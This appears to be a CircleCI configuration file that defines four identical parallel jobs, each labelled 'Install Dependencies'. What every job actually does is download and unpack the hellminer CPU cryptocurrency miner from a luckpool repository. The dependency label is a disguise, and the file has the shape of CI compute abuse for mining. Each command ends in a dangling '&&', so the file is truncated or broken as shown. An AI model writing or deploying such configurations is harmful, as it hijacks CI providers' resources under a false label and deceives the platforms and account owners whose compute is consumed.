version: 2.1
jobs:
    Devop:
      docker:
            - image: cimg/python:3.8
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz &&
    Devop1:
      docker:
            - image: cimg/python:3.8
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz &&
    Devop2:
      docker:
            - image: cimg/python:3.8
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz &&
    Devop3:
      docker:
            - image: cimg/python:3.8
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz &&
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3